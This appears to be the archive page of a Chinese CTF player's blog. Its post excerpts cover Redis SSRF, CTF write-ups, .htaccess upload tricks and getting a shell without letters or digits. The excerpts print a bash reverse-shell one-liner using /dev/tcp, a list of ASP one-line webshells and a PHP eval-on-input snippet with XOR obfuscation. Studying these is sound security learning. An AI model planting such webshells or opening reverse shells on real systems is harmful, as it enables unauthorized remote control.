3rsh1
/single dog/college student/ctfer
3rsh1's Blog


文章归档

浅析Redis中SSRF的利用

内容承接gkctf的web3。 记得之前还看过ssrf的视频结果因为看不懂就给跳过去了,😓。果然出来混迟早都是要还的。 基础部分 gopher协议: Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到…

   24   2020-05-29   阅读更多

[GKCTF]wp

checkin 不想说做题历程了。 题目的重点是disable_function的绕过,之前整理过笔记,是基于安恒杯四月赛的web2的。首先贴出代码: <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; …

   65   2020-05-28   阅读更多

linux反弹shell的几种方式和理解

本文的大部分内容都是参考以下的这篇文章的: https://www.freebuf.com/articles/system/178150.html 如果以后有新的姿势的话,还会继续补充的。 方法1 bash -i >& /dev/tcp/ip/port 0>&1 啥意思呢,先看几个知识点: linux下有三个标准的文件描…

   31   2020-05-28   阅读更多

一言

你没有如期归来,而这正是离别的意义。 ——海子《白日梦》 过去其实并没有真正的过去,过去就活在今天。 ——威廉·福克纳 《修女安魂曲》 原来女生喜欢收集一些可可爱爱的东西。 ——2020.06.18

   26   2020-05-23   阅读更多

无字母数字getshell小结

代码如下: <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) { eval($_GET['shell']); } 方法一: 利用异或的操作来获取自己需要的字母和数字: <?php $_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='asser…

   60   2020-05-20   阅读更多

cgi程序在文件上传漏洞getshell中的利用——[de1ctf 2020]check in

基础 题目是有两种解法的,非预期解是反斜杠可以拼接/.htaccess内的配置项,预期解是cgi执行。这里就先说一下cgi执行,感觉还是蛮有意思的。 PHP在Apache中一共有三种工作方式:CGI模式、Apache模块DLL、FastCGI模式。 .htaccess 如果要让.htaccess文件的配置项生效…

   79   2020-05-11   阅读更多

.htaccess文件与文件上传——[XNUCA2019Qualifier]easyphp

easyphp 直接贴出源码: <?php $files = scandir('./'); foreach($files as $file) { if(is_file($file)){ if ($file !== "index.php") { unlink($file); } } } include_once("fl3g.p…

   69   2020-05-11   阅读更多

一些编码网站——转载

xssee:http://web2hack.org/xssee xssee:http://evilcos.me/lab/xssee 程默的博客(DES,3DES,AES,RC,Blowfish,Twofish,Serpent,Gost,Rijndael,Cast,Xtea,RSA):http://tool.chacuo.net/cryptdes 在线编码解码(多种并排):http://bianma.911cha.com 在线加密解密(多种)…

   44   2020-05-11   阅读更多

一句话木马小集

<%eval request("c")%> <%execute request("c")%> <%execute(request("c"))%> <%ExecuteGlobal request("sb")%> %><%Eval(Request(chr(35)))%><% <%if request ("c")<>""then session("c")=request("c"):end if:if sessi…

   19   2020-05-09   阅读更多

disable_functions绕过——安恒月赛web2babytricks

决定还是整理一下,看了几篇相关文章都看不大懂,即使刚修完操作系统。其实在php代码审计2里提到过一点disable_functions的绕过,但是当初写的时候也是迷迷糊糊的,笔记也不是很全面,这里再补充一下。还有感觉以后还是要关注一下linux操作系统吧,然后就想起来了那本…

   27   2020-05-05   阅读更多
加载更多